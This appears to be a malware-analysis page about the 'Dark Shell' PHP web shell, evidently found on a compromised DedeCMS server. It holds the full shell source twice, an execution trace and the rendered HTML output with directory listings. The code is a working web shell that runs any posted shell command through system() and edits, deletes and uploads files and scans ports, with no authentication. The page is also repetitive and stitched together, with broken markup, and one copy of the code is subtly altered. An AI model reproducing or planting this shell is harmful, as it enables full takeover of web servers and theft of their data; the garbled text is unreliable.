Jump to:
Screenshot
Attributes
Environment
<html>
<head>
<title>
</title>
</head>
<body>
<style type="text/css">
body{
background: #E4E4E4;
color: #666666;
font-family: Verdana;
font-size: 11px;
}
a:link{
color: #33CC99;
}
a:visited{
color: #33CC99;
}
a:hover{
text-decoration: none;
Color: #3399FF;
}
table {
font-size: 11px;
}
</style>
<?php
error_reporting(0);
set_time_limit(0);
if (empty($_GET['dir'])) {
$dir = getcwd();
} else {
$dir = $_GET['dir'];
}
chdir($dir);
$current = htmlentities($_SERVER['PHP_SELF'] . "?dir=" . $dir);
echo "<center><h1>Dark Shell</h1></center><p><hr><p>\n";
echo "<i>Server: " . $_SERVER['SERVER_NAME'] . "<br>\n";
echo "Current directory: " . getcwd() . "<br>\n";
echo "Software: " . $_SERVER['SERVER_SOFTWARE'] . "<pre>\n\n</pre></i>\n";
echo "<pre>\n\n\n</pre>";
echo "<table width = 50%>";
echo "<tr>";
echo "<td><a href = '" . $current . "&mode=system'>Shell Command</a></td>\n";
echo "<td><a href = '" . $current . "&mode=create'>Create a new file</a></td>\n";
echo "<td><a href = '" . $current . "&mode=upload'>Upload file</a></td>\n";
echo "<td><a href = '" . $current . "&mode=port_scan'>Port Scan</a></td>\n";
echo "</tr></table>";
echo "<pre>\n\n</pre>";
$mode = $_GET['mode'];
switch ($mode) {
case 'edit':
$file = $_GET['file'];
$new = $_POST['new'];
if (empty($new)) {
$fp = fopen($file, "r");
$file_cont = fread($fp, filesize($file));
$file_cont = str_replace("<textarea>", "<textarea>", $file_cont);
echo "<form action = '" . $current . "&mode=edit&file=" . $file . "' method = 'POST'>\n";
echo "File: " . $file . "<br>\n";
echo "<textarea name = 'new' rows = '30' cols = '50'>" . $file_cont . "<textarea><br>\n";
echo "<input type = 'submit' value = 'Edit'></form>\n";
} else {
$fp = fopen($file, "w");
if (fwrite($fp, $new)) {
echo $file . " edited.<p>";
} else {
echo "Unable to edit " . $file . ".<p>";
}
}
fclose($fp);
break;
case 'delete':
$file = $_GET['file'];
if (unlink($file)) {
echo $file . " deleted successfully.<p>";
} else {
echo "Unable to delete " . $file . ".<p>";
}
break;
case 'copy':
$src = $_GET['src'];
$dst = $_POST['dst'];
if (empty($dst)) {
echo "<form action = '" . $current . "&mode=copy&src=" . $src . "' method = 'POST'>\n";
echo "Destination: <input name = 'dst'><br>\n";
echo "<input type = 'submit' value = 'Copy'></form>\n";
} else {
if (copy($src, $dst)) {
echo "File copied successfully.<p>\n";
} else {
echo "Unable to copy " . $src . ".<p>\n";
}
}
break;
case 'move':
$src = $_GET['src'];
$dst = $_POST['dst'];
if (empty($dst)) {
echo "<form action = '" . $current . "&mode=move&src=" . $src . "' method = 'POST'>\n";
echo "Destination: <input name = 'dst'><br>\n";
echo "<input type = 'submit' value = 'Move'></form>\n";
} else {
if (rename($src, $dst)) {
echo "File moved successfully.<p>\n";
} else {
echo "Unable to move " . $src . ".<p>\n";
}
}
break;
case 'rename':
$old = $_GET['old'];
$new = $_POST['new'];
if (empty($new)) {
echo "<form action = '" . $current . "&mode=rename&old=" . $old . "' method = 'POST'>\n";
echo "New name: <input name = 'new'><br>\n";
echo "<input type = 'submit' value = 'Rename'></form>\n";
} else {
if (rename($old, $new)) {
echo "File/Directory renamed successfully.<p>\n";
} else {
echo "Unable to rename " . $old . ".<p>\n";
}
}
break;
case 'rmdir':
$rm = $_GET['rm'];
if (rmdir($rm)) {
echo "Directory removed successfully.<p>\n";
} else {
echo "Unable to remove " . $rm . ".<p>\n";
}
break;
case 'system':
$cmd = $_POST['cmd'];
if (empty($cmd)) {
echo "<form action = '" . $current . "&mode=system' method = 'POST'>\n";
echo "Shell Command: <input name = 'cmd'>\n";
echo "<input type = 'submit' value = 'Run'></form><p>\n";
} else {
system($cmd);
}
break;
case 'create':
$new = $_POST['new'];
if (empty($new)) {
echo "<form action = '" . $current . "&mode=create' method = 'POST'>\n";
echo "<tr><td>New file: <input name = 'new'></td>\n";
echo "<td><input type = 'submit' value = 'Create'></td></tr></form>\n<p>";
} else {
if ($fp = fopen($new, "w")) {
echo "File created successfully.<p>\n";
} else {
echo "Unable to create " . $file . ".<p>\n";
}
fclose($fp);
}
break;
case 'upload':
$temp = $_FILES['upload_file']['tmp_name'];
$file = basename($_FILES['upload_file']['name']);
if (empty($file)) {
echo "<form action = '" . $current . "&mode=upload' method = 'POST' ENCTYPE='multipart/form-data'>\n";
echo "Local file: <input type = 'file' name = 'upload_file'>\n";
echo "<input type = 'submit' value = 'Upload'>\n";
echo "</form>\n<pre>\n\n</pre>";
} else {
if (move_uploaded_file($temp, $file)) {
echo "File uploaded successfully.<p>\n";
unlink($temp);
} else {
echo "Unable to upload " . $file . ".<p>\n";
}
}
break;
case 'port_scan':
$port_range = $_POST['port_range'];
if (empty($port_range)) {
echo "<table><form action = '" . $current . "&mode=port_scan' method = 'POST'>";
echo "<tr><td><input type = 'text' name = 'port_range'></td><td>";
echo "Enter port range where you want to do port scan (ex.: 0:65535)</td></tr>";
echo "<tr><td><input type = 'submit' value = 'Port Scan'></td></tr></form></table>";
} else {
$range = explode(":", $port_range);
if (!is_numeric($range[0]) or !is_numeric($range[1])) {
echo "Bad parameters.<br>";
} else {
$host = 'localhost';
$from = $range[0];
$to = $range[1];
echo "Open ports:<br>";
while ($from <= $to) {
$var = 0;
$fp = fsockopen($host, $from) or $var = 1;
if (false) {
echo $from . "<br>";
}
$from++;
fclose($fp);
}
}
}
break;
}
clearstatcache();
echo "<pre>\n\n</pre>";
echo "<table width = 100%>\n";
$files = scandir($dir);
foreach ($files as $file) {
if (is_file($file)) {
$size = round(filesize($file) / 1024, 2);
echo "<tr><td>" . $file . "</td>";
echo "<td>" . $size . " KB</td>";
echo "<td><a href = " . $current . "&mode=edit&file=" . $file . ">Edit</a></td>\n";
echo "<td><a href = " . $current . "&mode=delete&file=" . $file . ">Delete</a></td>\n";
echo "<td><a href = " . $current . "&mode=copy&src=" . $file . ">Copy</a></td>\n";
echo "<td><a href = " . $current . "&mode=move&src=" . $file . ">Move</a></td>\n";
echo "<td><a href = " . $current . "&mode=rename&old=" . $file . ">Remame</a></td></tr>\n";
} else {
$items = scandir($file);
$items_num = count($items) - 2;
echo "<tr><td>" . $file . "</td>";
echo "<td>" . $items_num . " Items</td>";
echo "<td><a href = " . $current . "/" . $file . ">Change directory</a></td>\n";
echo "<td><a href = " . $current . "&mode=rmdir&rm=" . $file . ">Remove directory</a></td>\n";
echo "<td><a href = " . $current . "&mode=rename&old=" . $file . ">Rename directory</a></td></tr>\n";
}
}
echo "</table>\n";
?><textarea><br>
<input type = 'submit' value = 'Edit'></form>
<pre>
</pre><table width = 100%>
<tr><td>.</td><td>3 Items</td><td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task/.>Change directory</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=rmdir&rm=.>Remove directory</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=rename&old=.>Rename directory</a></td></tr>
<tr><td>..</td><td>40 Items</td><td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task/..>Change directory</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=rmdir&rm=..>Remove directory</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=rename&old=..>Rename directory</a></td></tr>
<tr><td>dede-maketimehtml.php</td><td>0.23 KB</td><td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=edit&file=dede-maketimehtml.php>Edit</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=delete&file=dede-maketimehtml.php>Delete</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=copy&src=dede-maketimehtml.php>Copy</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=move&src=dede-maketimehtml.php>Move</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=rename&old=dede-maketimehtml.php>Remame</a></td></tr>
<tr><td>dede-maketimehtmls.php</td><td>6.58 KB</td><td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=edit&file=dede-maketimehtmls.php>Edit</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=delete&file=dede-maketimehtmls.php>Delete</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=copy&src=dede-maketimehtmls.php>Copy</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=move&src=dede-maketimehtmls.php>Move</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=rename&old=dede-maketimehtmls.php>Remame</a></td></tr>
<tr><td>dede-optimize-table.php</td><td>0.24 KB</td><td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=edit&file=dede-optimize-table.php>Edit</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=delete&file=dede-optimize-table.php>Delete</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=copy&src=dede-optimize-table.php>Copy</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=move&src=dede-optimize-table.php>Move</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=rename&old=dede-optimize-table.php>Remame</a></td></tr>
</table>
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:27:39.546961]
1 0 1 0.000150 393464
1 3 0 0.000411 438264 {main} 1 /var/www/html/uploads/1.php 0 0
2 4 0 0.000429 438264 error_reporting 0 /var/www/html/uploads/1.php 30 1 0
2 4 1 0.000444 438304
2 4 R 22527
2 5 0 0.000458 438264 set_time_limit 0 /var/www/html/uploads/1.php 31 1 0
2 5 1 0.000473 438328
2 5 R FALSE
2 6 0 0.000488 438296 getcwd 0 /var/www/html/uploads/1.php 33 0
2 6 1 0.000501 438344
2 6 R '/var/www/html/uploads'
1 A /var/www/html/uploads/1.php 33 $dir = '/var/www/html/uploads'
2 7 0 0.000529 438344 chdir 0 /var/www/html/uploads/1.php 38 1 '/var/www/html/uploads'
2 7 1 0.000544 438432
2 7 R TRUE
2 8 0 0.000558 438472 htmlentities 0 /var/www/html/uploads/1.php 39 1 '/uploads/1.php?dir=/var/www/html/uploads'
2 8 1 0.000574 438664
2 8 R '/uploads/1.php?dir=/var/www/html/uploads'
1 A /var/www/html/uploads/1.php 39 $current = '/uploads/1.php?dir=/var/www/html/uploads'
2 9 0 0.000603 438552 getcwd 0 /var/www/html/uploads/1.php 43 0
2 9 1 0.000615 438600
2 9 R '/var/www/html/uploads'
1 A /var/www/html/uploads/1.php 58 $mode = NULL
2 10 0 0.000645 438552 clearstatcache 0 /var/www/html/uploads/1.php 235 0
2 10 1 0.000657 438552
2 10 R NULL
2 11 0 0.000670 438552 scandir 0 /var/www/html/uploads/1.php 239 1 '/var/www/html/uploads'
2 11 1 0.000701 439168
2 11 R [0 => '.', 1 => '..', 2 => '.htaccess', 3 => '1.php', 4 => 'data', 5 => 'prepend.php']
1 A /var/www/html/uploads/1.php 239 $files = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => '1.php', 4 => 'data', 5 => 'prepend.php']
2 12 0 0.000739 439136 is_file 0 /var/www/html/uploads/1.php 241 1 '.'
2 12 1 0.000754 439184
2 12 R FALSE
2 13 0 0.000767 439144 scandir 0 /var/www/html/uploads/1.php 253 1 '.'
2 13 1 0.000789 439760
2 13 R [0 => '.', 1 => '..', 2 => '.htaccess', 3 => '1.php', 4 => 'data', 5 => 'prepend.php']
1 A /var/www/html/uploads/1.php 253 $items = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => '1.php', 4 => 'data', 5 => 'prepend.php']
1 A /var/www/html/uploads/1.php 254 $items_num = 4
2 14 0 0.000836 439728 is_file 0 /var/www/html/uploads/1.php 241 1 '..'
2 14 1 0.000851 439768
2 14 R FALSE
2 15 0 0.000864 439728 scandir 0 /var/www/html/uploads/1.php 253 1 '..'
2 15 1 0.000888 440232
2 15 R [0 => '.', 1 => '..', 2 => 'uploads']
1 A /var/www/html/uploads/1.php 253 $items = [0 => '.', 1 => '..', 2 => 'uploads']
1 A /var/www/html/uploads/1.php 254 $items_num = 1
2 16 0 0.000950 439616 is_file 0 /var/www/html/uploads/1.php 241 1 '.htaccess'
2 16 1 0.000966 439664
2 16 R TRUE
2 17 0 0.000979 439624 filesize 0 /var/www/html/uploads/1.php 243 1 '.htaccess'
2 17 1 0.000992 439664
2 17 R 64
2 18 0 0.001005 439624 round 0 /var/www/html/uploads/1.php 243 2 0.0625 2
2 18 1 0.001019 439696
2 18 R 0.06
1 A /var/www/html/uploads/1.php 243 $size = 0.06
2 19 0 0.001046 439624 is_file 0 /var/www/html/uploads/1.php 241 1 '1.php'
2 19 1 0.001060 439656
2 19 R TRUE
2 20 0 0.001073 439616 filesize 0 /var/www/html/uploads/1.php 243 1 '1.php'
2 20 1 0.001085 439656
2 20 R 9903
2 21 0 0.001098 439616 round 0 /var/www/html/uploads/1.php 243 2 9.6708984375 2
2 21 1 0.001110 439688
2 21 R 9.67
1 A /var/www/html/uploads/1.php 243 $size = 9.67
2 22 0 0.001136 439616 is_file 0 /var/www/html/uploads/1.php 241 1 'data'
2 22 1 0.001150 439656
2 22 R FALSE
2 23 0 0.001163 439616 scandir 0 /var/www/html/uploads/1.php 253 1 'data'
2 23 1 0.001186 440144
2 23 R [0 => '.', 1 => '..', 2 => 'trace-1676255233.6491.xt.gz']
1 A /var/www/html/uploads/1.php 253 $items = [0 => '.', 1 => '..', 2 => 'trace-1676255233.6491.xt.gz']
1 A /var/www/html/uploads/1.php 254 $items_num = 1
2 24 0 0.001230 439640 is_file 0 /var/www/html/uploads/1.php 241 1 'prepend.php'
2 24 1 0.001245 439688
2 24 R TRUE
2 25 0 0.001257 439648 filesize 0 /var/www/html/uploads/1.php 243 1 'prepend.php'
2 25 1 0.001270 439688
2 25 R 57
2 26 0 0.001283 439648 round 0 /var/www/html/uploads/1.php 243 2 0.0556640625 2
2 26 1 0.001302 439720
2 26 R 0.06
1 A /var/www/html/uploads/1.php 243 $size = 0.06
1 3 1 0.001334 439760
0.001362 315752
TRACE END [2023-02-13 00:27:39.548205]
<html><head>
<title>
</title>
</head>
<body>
<style type="text/css">
body{
background: #E4E4E4;
color: #666666;
font-family: Verdana;
font-size: 11px;
}
a:link{
color: #33CC99;
}
a:visited{
color: #33CC99;
}
a:hover{
text-decoration: none;
Color: #3399FF;
}
table {
font-size: 11px;
}
</style>
<center><h1>Dark Shell</h1></center><p></p><hr><p>
<i>Server: localhost<br>
Current directory: /var/www/html<br>
Software: Apache/2.4.52 (Ubuntu)</i></p><pre><i>
</i></pre>
<pre>
</pre><table width="50%"><tbody><tr><td><a href="/1.php?dir=/var/www/html&mode=system">Shell Command</a></td>
<td><a href="/1.php?dir=/var/www/html&mode=create">Create a new file</a></td>
<td><a href="/1.php?dir=/var/www/html&mode=upload">Upload file</a></td>
<td><a href="/1.php?dir=/var/www/html&mode=port_scan">Port Scan</a></td>
</tr></tbody></table><pre>
</pre><pre>
</pre><table width="100%">
<tbody><tr><td>.</td><td>2 Items</td><td><a href="/1.php?dir=/var/www/html/.">Change directory</a></td>
<td><a href="/1.php?dir=/var/www/html&mode=rmdir&rm=.">Remove directory</a></td>
<td><a href="/1.php?dir=/var/www/html&mode=rename&old=.">Rename directory</a></td></tr>
<tr><td>..</td><td>2 Items</td><td><a href="/1.php?dir=/var/www/html/..">Change directory</a></td>
<td><a href="/1.php?dir=/var/www/html&mode=rmdir&rm=..">Remove directory</a></td>
<td><a href="/1.php?dir=/var/www/html&mode=rename&old=..">Rename directory</a></td></tr>
<tr><td>1.php</td><td>9.67 KB</td><td><a href="/1.php?dir=/var/www/html&mode=edit&file=1.php">Edit</a></td>
<td><a href="/1.php?dir=/var/www/html&mode=delete&file=1.php">Delete</a></td>
<td><a href="/1.php?dir=/var/www/html&mode=copy&src=1.php">Copy</a></td>
<td><a href="/1.php?dir=/var/www/html&mode=move&src=1.php">Move</a></td>
<td><a href="/1.php?dir=/var/www/html&mode=rename&old=1.php">Remame</a></td></tr>
<tr><td>beneri.se_malware_analysis</td><td>0 KB</td><td><a href="/1.php?dir=/var/www/html&mode=edit&file=beneri.se_malware_analysis">Edit</a></td>
<td><a href="/1.php?dir=/var/www/html&mode=delete&file=beneri.se_malware_analysis">Delete</a></td>
<td><a href="/1.php?dir=/var/www/html&mode=copy&src=beneri.se_malware_analysis">Copy</a></td>
<td><a href="/1.php?dir=/var/www/html&mode=move&src=beneri.se_malware_analysis">Move</a></td>
<td><a href="/1.php?dir=/var/www/html&mode=rename&old=beneri.se_malware_analysis">Remame</a></td></tr>
</tbody></table>
<textarea><br>
<input type = 'submit' value = 'Edit'></form>
<pre>
</pre><table width = 100%>
<tr><td>.</td><td>3 Items</td><td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task/.>Change directory</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=rmdir&rm=.>Remove directory</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=rename&old=.>Rename directory</a></td></tr>
<tr><td>..</td><td>40 Items</td><td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task/..>Change directory</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=rmdir&rm=..>Remove directory</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=rename&old=..>Rename directory</a></td></tr>
<tr><td>dede-maketimehtml.php</td><td>0.23 KB</td><td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=edit&file=dede-maketimehtml.php>Edit</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=delete&file=dede-maketimehtml.php>Delete</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=copy&src=dede-maketimehtml.php>Copy</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=move&src=dede-maketimehtml.php>Move</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=rename&old=dede-maketimehtml.php>Remame</a></td></tr>
<tr><td>dede-maketimehtmls.php</td><td>6.58 KB</td><td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=edit&file=dede-maketimehtmls.php>Edit</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=delete&file=dede-maketimehtmls.php>Delete</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=copy&src=dede-maketimehtmls.php>Copy</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=move&src=dede-maketimehtmls.php>Move</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=rename&old=dede-maketimehtmls.php>Remame</a></td></tr>
<tr><td>dede-optimize-table.php</td><td>0.24 KB</td><td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=edit&file=dede-optimize-table.php>Edit</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=delete&file=dede-optimize-table.php>Delete</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=copy&src=dede-optimize-table.php>Copy</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=move&src=dede-optimize-table.php>Move</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=rename&old=dede-optimize-table.php>Remame</a></td></tr>
</table>
</textarea></body></html>
<html>
<head>
<title>
</title>
</head>
<body>
<style type="text/css">
body{
background: #E4E4E4;
color: #666666;
font-family: Verdana;
font-size: 11px;
}
a:link{
color: #33CC99;
}
a:visited{
color: #33CC99;
}
a:hover{
text-decoration: none;
Color: #3399FF;
}
table {
font-size: 11px;
}
</style>
<?php
error_reporting (0);
set_time_limit (0);
if (empty ($_GET ['dir'])){
$dir = getcwd ();
}
else {
$dir = $_GET ['dir'];
}
chdir ($dir);
$current = htmlentities ($_SERVER ['PHP_SELF'] . "?dir=" . $dir);
echo "<center><h1>Dark Shell</h1></center><p><hr><p>\n";
echo "<i>Server: " . $_SERVER ['SERVER_NAME'] . "<br>\n";
echo "Current directory: " . getcwd () . "<br>\n";
echo "Software: " . $_SERVER ['SERVER_SOFTWARE'] . "<pre>\n\n</pre></i>\n";
echo "<pre>\n\n\n</pre>";
echo "<table width = 50%>";
echo "<tr>";
echo "<td><a href = '".$current."&mode=system'>Shell Command</a></td>\n";
echo "<td><a href = '".$current."&mode=create'>Create a new file</a></td>\n";
echo "<td><a href = '".$current."&mode=upload'>Upload file</a></td>\n";
echo "<td><a href = '".$current."&mode=port_scan'>Port Scan</a></td>\n";
echo "</tr></table>";
echo "<pre>\n\n</pre>";
$mode = $_GET ['mode'];
switch ($mode){
case 'edit':
$file = $_GET ['file'];
$new = $_POST ['new'];
if (empty ($new)){
$fp = fopen ($file, "r");
$file_cont = fread ($fp, filesize ($file));
$file_cont = str_replace ("<textarea>", "<textarea>", $file_cont);
echo "<form action = '".$current."&mode=edit&file=".$file."' method = 'POST'>\n";
echo "File: ". $file . "<br>\n";
echo "<textarea name = 'new' rows = '30' cols = '50'>".$file_cont."<textarea><br>\n";
echo "<input type = 'submit' value = 'Edit'></form>\n";
}
else {
$fp = fopen ($file, "w");
if (fwrite ($fp, $new)){
echo $file . " edited.<p>";
}
else {
echo "Unable to edit " . $file . ".<p>";
}
}
fclose ($fp);
break;
case 'delete':
$file = $_GET ['file'];
if (unlink ($file)){
echo $file . " deleted successfully.<p>";
}
else {
echo "Unable to delete " . $file . ".<p>";
}
break;
case 'copy':
$src = $_GET ['src'];
$dst = $_POST ['dst'];
if (empty ($dst)){
echo "<form action = '".$current . "&mode=copy&src=" . $src . "' method = 'POST'>\n";
echo "Destination: <input name = 'dst'><br>\n";
echo "<input type = 'submit' value = 'Copy'></form>\n";
}
else {
if (copy ($src, $dst)){
echo "File copied successfully.<p>\n";
}
else {
echo "Unable to copy " . $src . ".<p>\n";
}
}
break;
case 'move':
$src = $_GET ['src'];
$dst = $_POST ['dst'];
if (empty ($dst)){
echo "<form action = '".$current . "&mode=move&src=" . $src . "' method = 'POST'>\n";
echo "Destination: <input name = 'dst'><br>\n";
echo "<input type = 'submit' value = 'Move'></form>\n";
}
else {
if (rename ($src, $dst)){
echo "File moved successfully.<p>\n";
}
else {
echo "Unable to move " . $src . ".<p>\n";
}
}
break;
case 'rename':
$old = $_GET ['old'];
$new = $_POST ['new'];
if (empty ($new)){
echo "<form action = '".$current . "&mode=rename&old=" . $old . "' method = 'POST'>\n";
echo "New name: <input name = 'new'><br>\n";
echo "<input type = 'submit' value = 'Rename'></form>\n";
}
else {
if (rename ($old, $new)){
echo "File/Directory renamed successfully.<p>\n";
}
else {
echo "Unable to rename " . $old . ".<p>\n";
}
}
break;
case 'rmdir':
$rm = $_GET ['rm'];
if (rmdir ($rm)){
echo "Directory removed successfully.<p>\n";
}
else {
echo "Unable to remove " . $rm . ".<p>\n";
}
break;
case 'system':
$cmd = $_POST ['cmd'];
if (empty ($cmd)){
echo "<form action = '".$current . "&mode=system' method = 'POST'>\n";
echo "Shell Command: <input name = 'cmd'>\n";
echo "<input type = 'submit' value = 'Run'></form><p>\n";
}
else {
system ($cmd);
}
break;
case 'create':
$new = $_POST ['new'];
if (empty ($new)){
echo "<form action = '".$current . "&mode=create' method = 'POST'>\n";
echo "<tr><td>New file: <input name = 'new'></td>\n";
echo "<td><input type = 'submit' value = 'Create'></td></tr></form>\n<p>";
}
else {
if ($fp = fopen ($new, "w")){
echo "File created successfully.<p>\n";
}
else {
echo "Unable to create ".$file.".<p>\n";
}
fclose ($fp);
}
break;
case 'upload':
$temp = $_FILES['upload_file']['tmp_name'];
$file = basename($_FILES['upload_file']['name']);
if (empty ($file)){
echo "<form action = '".$current . "&mode=upload' method = 'POST' ENCTYPE='multipart/form-data'>\n";
echo "Local file: <input type = 'file' name = 'upload_file'>\n";
echo "<input type = 'submit' value = 'Upload'>\n";
echo "</form>\n<pre>\n\n</pre>";
}
else {
if(move_uploaded_file($temp,$file)){
echo "File uploaded successfully.<p>\n";
unlink ($temp);
}
else {
echo "Unable to upload " . $file . ".<p>\n";
}
}
break;
case 'port_scan':
$port_range = $_POST ['port_range'];
if (empty ($port_range)){
echo "<table><form action = '".$current. "&mode=port_scan' method = 'POST'>";
echo "<tr><td><input type = 'text' name = 'port_range'></td><td>";
echo "Enter port range where you want to do port scan (ex.: 0:65535)</td></tr>";
echo "<tr><td><input type = 'submit' value = 'Port Scan'></td></tr></form></table>";
}
else {
$range = explode (":", $port_range);
if ((!is_numeric ($range [0])) or (!is_numeric ($range [1]))){
echo "Bad parameters.<br>";
}
else {
$host = 'localhost';
$from = $range [0];
$to = $range [1];
echo "Open ports:<br>";
while ($from <= $to){
$var = 0;
$fp = fsockopen ($host, $from) or $var = 1;
if ($var == 0){
echo $from . "<br>";
}
$from++;
fclose ($fp);
}
}
}
break;
}
clearstatcache ();
echo "<pre>\n\n</pre>";
echo "<table width = 100%>\n";
$files = scandir ($dir);
foreach ($files as $file){
if (is_file ($file)){
$size = round (filesize ($file) / 1024, 2);
echo "<tr><td>".$file."</td>";
echo "<td>".$size." KB</td>";
echo "<td><a href = ".$current . "&mode=edit&file=".$file.">Edit</a></td>\n";
echo "<td><a href = ".$current . "&mode=delete&file=".$file.">Delete</a></td>\n";
echo "<td><a href = ".$current . "&mode=copy&src=".$file.">Copy</a></td>\n";
echo "<td><a href = ".$current . "&mode=move&src=".$file.">Move</a></td>\n";
echo "<td><a href = ".$current . "&mode=rename&old=".$file.">Remame</a></td></tr>\n";
}
else {
$items = scandir ($file);
$items_num = count ($items) - 2;
echo "<tr><td>".$file."</td>";
echo "<td>".$items_num." Items</td>";
echo "<td><a href = ".$current . "/" . $file.">Change directory</a></td>\n";
echo "<td><a href = ".$current . "&mode=rmdir&rm=".$file.">Remove directory</a></td>\n";
echo "<td><a href = ".$current . "&mode=rename&old=".$file.">Rename directory</a></td></tr>\n";
}
}
echo "</table>\n";
?><textarea><br>
<input type = 'submit' value = 'Edit'></form>
<pre>
</pre><table width = 100%>
<tr><td>.</td><td>3 Items</td><td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task/.>Change directory</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=rmdir&rm=.>Remove directory</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=rename&old=.>Rename directory</a></td></tr>
<tr><td>..</td><td>40 Items</td><td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task/..>Change directory</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=rmdir&rm=..>Remove directory</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=rename&old=..>Rename directory</a></td></tr>
<tr><td>dede-maketimehtml.php</td><td>0.23 KB</td><td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=edit&file=dede-maketimehtml.php>Edit</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=delete&file=dede-maketimehtml.php>Delete</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=copy&src=dede-maketimehtml.php>Copy</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=move&src=dede-maketimehtml.php>Move</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=rename&old=dede-maketimehtml.php>Remame</a></td></tr>
<tr><td>dede-maketimehtmls.php</td><td>6.58 KB</td><td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=edit&file=dede-maketimehtmls.php>Edit</a></td>
